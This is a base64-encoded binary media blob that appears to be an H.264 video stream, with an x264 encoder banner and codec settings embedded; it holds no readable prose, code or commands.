AUUAFG//EKWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXeBiFLS0tLS0tLS0tLS0tLS0tLwhEUUAFFABRv/xClpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWl3gghS0tLS0tLS0tLS0tLS0tLS0vCERRQAUUAFG//EKWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXeCCFLS0tLS0tLS0tLS0tLS0tLS8IRFFABRQAUb/8QpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpd4GIUtLS0tLS0tLS0tLS0tLS0vCERRQAUUAFG//EKWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXeCCFLS0tLS0tLS0tLS0tLS0tLS8IRFFABRQAUb/8QpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpd4IIUtLS0tLS0tLS0tLS0tLS0tLwhEUUAFFABRv/xClpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWl3gYhS0tLS0tLS0tLS0tLS0tLS8IRFFABRQAUb/8QpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpd4IIUtLS0tLS0tLS0tLS0tLS0tLwhEUUAFFABRv/xClpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWl3gghS0tLS0tLS0tLS0tLS0tLS0vCERRQAUUAFG//EKWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXeBiFLS0tLS0tLS0tLS0tLS0tLwhEUUAFFABRv/xClpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWl3gghS0tLS0tLS0tLS0tLS0tLS0vCERRQAUUAFG//EKWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXeCCFLS0tLS0tLS0tLS0tLS0tLS8IRFFABRQAUb/8QpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpd4GIUtLS0tLS0tLS0tLS0tLS0vCERRQAUUAFG//EKWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXeCCFLS0tLS0tLS0tLS0tLS0tLS8IRFFABRQAUb/8QpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpd4IIUtLS0tLS0tLS0tLS0tLS0tLwhEUUAFFABRv/xClpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWl3gYhS0tLS0tLS0tLS0tLS0tLS8IRFFABRQAUb/8QpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpd4IIUtLS0tLS0tLS0tLS0tLS0tLwhEUUAFFABRv/xClpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWl3gghS0tLS0tLS0tLS0tLS0tLS0vCERRQAUUAFG//EKWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXeBiFLS0tLS0tLS0tLS0tLS0tLwhEUUAFFABRv/xClpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWl3gghS0tLS0tLS0tLS0tLS0tLS0vCERRQAUUAFG//EKWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaXeCCFLS0tLS0tLS0tLS0tLS0tLS8AAAC4gYF///e3EXpvebZSLeWLNgg2SPu73gyNjQgLS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